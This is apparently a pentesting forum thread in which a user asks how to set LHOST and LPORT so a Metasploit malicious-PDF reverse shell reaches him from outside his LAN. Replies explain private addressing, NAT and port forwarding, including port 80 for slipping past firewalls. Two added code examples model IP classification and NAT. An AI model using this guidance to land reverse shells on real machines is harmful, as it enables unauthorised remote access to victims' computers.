      Participant

      @sil wrote:

      @rebrov wrote:

      LHOST => 192.168.8.128

      my question is : at the part–> set LHOST 192.168.8.128

      i put my local LAN ip or my public NATTED ip ?????

      what might be the problem ??

      Constructive criticism time…

      You need to learn the differences between routable IPs and RFC 1918 addresses. (http://www.faqs.org/rfcs/rfc1918.html) RFC 1918 addresses would never be routable across the Internet. So while you placed the L(istening)HOST address, you made it into a Local Address on the 192.168.8.x network. So unless both you and that victim were on the same network, it would never work. I suggest understanding the differences in addressing before even going further. Networking is a fundamental MUST UNDERSTAND if you’re going to get involved with pentesting. I rank it as the TOP priority.

      I suggest learning TCP/IP and routing so here is the freebie for the week: Juniper’s Fast Track training program. It’s free and informative for anyone seeking to understand networking. You don’t need to necessarily want to aim for JNCIA certification but watching the content and reading the content will help you in the long run.

      https://learningportal.juniper.net/juniper/user_fasttrack_home.aspx

      that’s why i ask, it doesn’t mean i don’t know 🙂

      i do know that u can’t if he is outside, that’s why i asked

      but u still didn’t answer my question: if he is in a different network outside my remote network then my local ip won’t work, right ??

      cuz after writing the script into the malicious pdf file, when he activates it the script will look for the LHOST, and its local ip will not go outside cuz it will be impossible for the script to search outside

      that’s why i asked what i should put instead of the LHOST !! ?

      i should put the WAN ip, my natted IP, and with port forwarding of the port i already put in the meta pdf script the reverse connection will know the way to my pc ,,,, that’s what i think !

      waiting for someone to fix my knowledge

      and btw ; i already passed 3 levels of CCNA 🙂

    • #31356
      Xen
      Participant

      LHOST should be the external IP address of your router and LPORT is the port ‘forwarded’ from your router to your internal machine. You can’t use your local LAN IP for LPORT because it’s a private IP address and private addresses aren’t routable on the internet. The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for local networks.

      10.0.0.0 – 10.255.255.255
      172.16.0.0 – 172.31.255.255
      192.168.0.0 – 192.168.255.255

      Suppose your router has an external IP address 172.16.1.1 (I’ve used a private IP address for this e.g. as I don’t want to offend anyone) and your computer’s IP address is 10.0.0.1.
      In this case you’ll set your LHOST to 172.16.1.1 and your LPORT to a port forwarded by your router to your 10.0.0.1 computer.

      i changed the LPORT to 80 in both steps cuz i think that router should pass the traffic to me because its port 80 and never be closed right ??

      We normally use port 80 for LPORT because most firewalls allow ‘outbound’ traffic through this port and communication through this looks pretty innocuous. Though the victim’s firewall will allow a reverse shell through port 80, you won’t get it unless you forward port 80 from your router to your computer, i.e. you have to specifically allow ‘inbound’ port 80.
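      Added example (editor's code, not from any post in this thread): a small Python classifier that checks an address against the three RFC 1918 blocks listed above and against the other non-routable ranges, so the reader can see which of the addresses mentioned in the thread (192.168.8.128, 10.0.0.167, 172.16.1.1) a host on the Internet could ever send a packet to. The `reachability` and `listener_note` function names are my own; 41.0.0.1 is a constructed stand-in for the poster's real WAN address, which only appears as 41.xxx.xxx.xxx.

```python
import ipaddress

# The three RFC 1918 blocks listed in the post above, written as networks
# so a membership test is a single "in" rather than a start/end comparison.
RFC1918_BLOCKS = (
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
)


def is_rfc1918(addr: str) -> bool:
    """True if addr is an IPv4 address inside one of the RFC 1918 private blocks."""
    ip = ipaddress.ip_address(addr)
    return ip.version == 4 and any(ip in block for block in RFC1918_BLOCKS)


def reachability(addr: str) -> str:
    """Classify an address by whether a host on the public Internet could route a packet to it.

    Returns one of:
      "rfc1918-private"  the three blocks above; never routed across the Internet
      "loopback"         127.0.0.0/8 or ::1
      "link-local"       169.254.0.0/16 or fe80::/10
      "reserved"         other non-global space (documentation ranges, CGNAT, ...)
      "public"           globally routable
    Only a "public" address can be the destination of a connection that
    originates outside a NAT router; everything else stops at the router or never leaves it.
    """
    ip = ipaddress.ip_address(addr)
    if is_rfc1918(addr):
        return "rfc1918-private"
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local"
    if not ip.is_global:
        return "reserved"
    return "public"


def listener_note(lhost: str) -> str:
    """One-line explanation of whether a host outside the NAT could reach this listener address."""
    kind = reachability(lhost)
    if kind == "public":
        return f"{lhost} is globally routable; inbound traffic reaches it only for ports the router forwards"
    return f"{lhost} is {kind}; a host on the Internet cannot send packets to it"


if __name__ == "__main__":
    # Addresses taken from the thread, plus 41.0.0.1 as a constructed stand-in
    # for the poster's WAN address (shown in the thread only as 41.xxx.xxx.xxx).
    for a in ("192.168.8.128", "10.0.0.167", "172.16.1.1", "41.0.0.1", "127.0.0.1"):
        print(listener_note(a))
```

      Note that `ipaddress`'s own `is_private` flag is wider than RFC 1918 (it also covers loopback, link-local and the documentation ranges), which is why the block keeps an explicit RFC 1918 list and reports the other cases separately.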

    • #31357
      rebrov
      Participant

      @Equix3n- wrote:

      LHOST should be the external IP address of your router and LPORT is the port ‘forwarded’ from your router to your internal machine. You can’t use your local LAN IP for LPORT because it’s a private IP address and private addresses aren’t routable on the internet. The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for local networks.

      10.0.0.0 – 10.255.255.255
      172.16.0.0 – 172.31.255.255
      192.168.0.0 – 192.168.255.255

      Suppose your router has an external IP address 172.16.1.1 (I’ve used a private IP address for this e.g. as I don’t want to offend anyone) and your computer’s IP address is 10.0.0.1.
      In this case you’ll set your LHOST to 172.16.1.1 and your LPORT to a port forwarded by your router to your 10.0.0.1 computer.

      i changed the LPORT to 80 in both steps cuz i think that router should pass the traffic to me because its port 80 and never be closed right ??

      We normally use port 80 for LPORT because most firewalls allow ‘outbound’ traffic through this port and communication through this looks pretty innocuous. Though the victim’s firewall will allow a reverse shell through port 80, you won’t get it unless you forward port 80 from your router to your computer, i.e. you have to specifically allow ‘inbound’ port 80.

      well thanks for the info

      however i didn’t figure out this part correctly

      what u want to say is … i should put the external ip of router

      let’s say my ip is 10.0.0.167, so the gateway of my network should be 10.0.0.1; well, not necessarily “should”, but most administrators reserve the 1st ip after the network address for the gateway
      example :

      10.0.0.0 = network
      10.0.0.1 = gateway
      10.0.0.2 = dns
      10.0.0.167 = my ip

      so the external ip u talking about is the gateway ?? 10.0.0.1 ???

      or the NAT ip that the router configured to translate the local operations over the internet to that NAT ip

      when u configuring the NAT pool …. is that what u mean ?

      because my gateway is 10.0.0.1 and my NAT (WAN) ip is 41.xxx.xxx.xxx

      which one do u mean? but from my network knowledge it can’t be 10.0.0.1, since the gateway will route my traffic to the WAN, to the outside

      but when im delivering packet from outside it will go through the WAN 41.xxx.xxx.xxx right !! ?

      so as a Meta script i should assign the WAN ip as the reverse connect back ip and port forward same port listening to my local ip

      what do u think  ?

      we all share info and knowledge here and thanks mate for co-operating with me i hope u can reply ASAP

      bye

    • #31358
      Xen
      Participant

      Your router has two interfaces: external and internal. Each interface has a separate IP address. When you use ‘ipconfig’, the IP address of the default gateway you see there is its IP address for your INTERNAL network. This address is not routable on the internet. Even my router can have the same internal IP address as your router and we’ll be able to communicate.

      What the world sees is the IP address of the external interface of your router. This IP address is your unique IP address on the internet. It’s the one that’s used when some other system wants to connect to you.

      So in this case set LHOST to 41.x.x.x and forward LPORT from your router to your 10.0.0.167 machine.

      I don’t think that your IP address basics are weak…it’s just that they aren’t strong ;D. Reading an IPv4 chapter from a good book will make your concepts clear.

    • #31359
      rebrov
      Participant

      @Equix3n- wrote:

      Your router has two interfaces: external and internal. Each interface has a separate IP address. When you use ‘ipconfig’, the IP address of the default gateway you see there is its IP address for your INTERNAL network. This address is not routable on the internet. Even my router can have the same internal IP address as your router and we’ll be able to communicate.

      What the world sees is the IP address of the external interface of your router. This IP address is your unique IP address on the internet. It’s the one that’s used when some other system wants to connect to you.

      So in this case set LHOST to 41.x.x.x and forward LPORT from your router to your 10.0.0.167 machine.

      I don’t think that your IP address basics are weak…it’s just that they aren’t strong ;D. Reading an IPv4 chapter from a good book will make your concepts clear.

      well 🙂 i already said i’ve taken CCNA course im at level 4 now 🙂

      dun have to read ipv4 again :S studied it already at the 1st level

      those levels that i already got Certificate on :

      1-Network Fundamentals

      2-Routing Protocols and Concepts

      3-LAN Switching and Wireless

      still need to pass the : 4-Accessing the WAN course

      so i can go for the final CCNA exam 🙂

      but what makes my info kinda weak is that i didn’t follow up on lvl 1; when i finish a lvl i go for the next one and don’t practice the earlier lvls 🙂

      thanks mate anyway

    • #31360
      rebrov
      Participant

      another question : if i dont have access to the router and i specified port 8080

      as LPORT and as LHOST i assigned my WAN external ip

      now when the reverse connection comes back to my router, which local ip will it choose to pass the traffic to !!!! because i think that all LAN ips should have port 80 open and allowed for incoming traffic from outside

      second question what if i opened port and forwarded it to my local ip

      and i did the same port to another ip !! ?

      what should be happen ?

      the router will flood the frame ( broadcast ) to all local ips except the one came from and when my ip gets the frame while im at handler listener mode i will receive it ??

      what do u think ??

    • #31361
      Xen
      Participant

      another question : if i dont have access to the router and i specified port 8080

      as LPORT and as LHOST i assigned my WAN external ip

      now when the reverse connection back again to my router which local ip will choose to pass the traffic !!!!

      In this case the LPORT will be your router’s port and the reverse connection will try to connect to your router. You have to forward the port to make the reverse connection reach your IP.

      because i think that all Lan ips should have port 80 open and allowed for incoming traffic from outside

      Port 80 is used by web servers. If you don’t have a web server in your network you don’t need to allow incoming port 80. Ports from 1 to 1023 are used for well known services. Ports above 1023 are used by your client programs and are randomly selected.
      So when you connect to a website your browser chooses a random port above 1023 and connects to port 80 of the website’s webserver.
      Your router should have all incoming ports blocked unless explicitly opened by you.

      second question what if i opened port and forwarded it to my local ip

      and i did the same port to another ip !! ?

      what should be happen ?

      You cannot forward the same port to multiple computers.
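      Added example (editor's code, not from any post in this thread): a toy Python model of the NAT router behaviour described in the two posts above. It keeps a static port-forward table and a state table for connections that LAN hosts opened themselves, and shows why an unsolicited packet to WAN port 80 is dropped, why a reply to a browser's outbound connection is delivered without any forwarding, why a packet addressed to 10.0.0.167 never arrives from outside, and why the same WAN port cannot be forwarded to two LAN hosts. The `NatRouter` class and its method names are my own; 41.0.0.1 stands in for the poster's 41.xxx.xxx.xxx WAN address and 198.51.100.7 (a documentation address) stands in for an arbitrary host on the Internet; both are constructed.

```python
from dataclasses import dataclass, field

Endpoint = tuple[str, int]  # (ip, port)


@dataclass
class NatRouter:
    """Minimal model of a home NAT router: one WAN address, a port-forward table,
    and a state table for connections the LAN hosts opened outward."""
    wan_ip: str
    forwards: dict[int, Endpoint] = field(default_factory=dict)
    sessions: dict[tuple[str, int, int], Endpoint] = field(default_factory=dict)
    next_wan_port: int = 40000  # ephemeral WAN ports handed out for outbound translations

    def add_forward(self, wan_port: int, lan_ip: str, lan_port: int) -> None:
        """Map a WAN port to one LAN host:port. A WAN port can belong to only one LAN host."""
        if wan_port in self.forwards:
            raise ValueError(f"WAN port {wan_port} is already forwarded to {self.forwards[wan_port]}")
        self.forwards[wan_port] = (lan_ip, lan_port)

    def outbound(self, lan_ip: str, lan_port: int, remote_ip: str, remote_port: int) -> int:
        """A LAN host opens a connection outward: allocate a WAN port and remember
        the translation so the reply can be sent back to the right LAN host."""
        wan_port = self.next_wan_port
        self.next_wan_port += 1
        self.sessions[(remote_ip, remote_port, wan_port)] = (lan_ip, lan_port)
        return wan_port

    def inbound(self, src_ip: str, src_port: int, dst_ip: str, dst_port: int) -> tuple[str, object]:
        """A packet arrives on the WAN side. Returns ("deliver", (lan_ip, lan_port)) or ("drop", reason)."""
        if dst_ip != self.wan_ip:
            # A packet for a 10.x / 192.168.x address is not the router's to accept;
            # the Internet would not have routed it here in the first place.
            return ("drop", f"{dst_ip} is not the WAN address")
        session = self.sessions.get((src_ip, src_port, dst_port))
        if session is not None:
            return ("deliver", session)  # reply to a connection a LAN host started
        forward = self.forwards.get(dst_port)
        if forward is not None:
            return ("deliver", forward)  # port explicitly exposed by the administrator
        return ("drop", f"no session and no forward for WAN port {dst_port}")


def demo() -> dict[str, tuple[str, object]]:
    """Replay the thread's scenario with constructed addresses; returns each case's outcome."""
    router = NatRouter(wan_ip="41.0.0.1")  # constructed stand-in for 41.xxx.xxx.xxx
    router.add_forward(4455, "10.0.0.167", 4455)  # the one port the LAN host is reachable on
    results: dict[str, tuple[str, object]] = {
        # unsolicited packet to WAN port 80: nothing forwarded there, so it stops at the router
        "unsolicited_80": router.inbound("198.51.100.7", 50000, "41.0.0.1", 80),
        # same packet to the forwarded port reaches the LAN host
        "forwarded_4455": router.inbound("198.51.100.7", 50000, "41.0.0.1", 4455),
        # a packet addressed directly to the private LAN address goes nowhere
        "addressed_to_lan_ip": router.inbound("198.51.100.7", 50000, "10.0.0.167", 4455),
    }
    # The browser case: LAN host connects out to a web server, the reply comes back
    # through the state table with no port forward needed.
    wan_port = router.outbound("10.0.0.167", 51234, "198.51.100.7", 80)
    results["reply_to_outbound"] = router.inbound("198.51.100.7", 80, "41.0.0.1", wan_port)
    # Forwarding the same WAN port to a second LAN host is rejected.
    try:
        router.add_forward(4455, "10.0.0.5", 4455)
        results["duplicate_forward"] = ("allowed", None)
    except ValueError as exc:
        results["duplicate_forward"] = ("rejected", str(exc))
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:22} -> {outcome}")
```

      The model deliberately has no "flood to every LAN host" path: a router that receives a packet for a WAN port with neither a matching session nor a forward entry discards it, which is the behaviour the reply above describes.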

    • #31362
      rebrov
      Participant

      thanks a lot buddy i fully understood

    • #31363
      Xen
      Participant

      I wonder with all those exploits and scans that you’re shooting, what’s the state of your friend’s computer ;D

    • #31364
      morpheus063
      Participant

      The friend’s computer is behind a router over which he does not have direct access (I presume). However, think about the status of his router after all these “confused port-forwardings”  😉

    • #31365
      rebrov
      Participant

      @Manu Zacharia (-M-) wrote:

      The friend’s computer is behind a router over which he does not have direct access (I presume). However, think about the status of his router after all these “confused port-forwardings”  😉

      ooh no, when i said i tried this and tested it on my friend’s pc, my friend let me do this; he accepted the nc over chat easily and opened it, he even typed the command i told him to

      but i can’t make the port forward since the router is mine to open, that’s why i can’t make it work, i don’t have access to the router that i’m associated to 😀

Copyright ©2020 Caendra, Inc.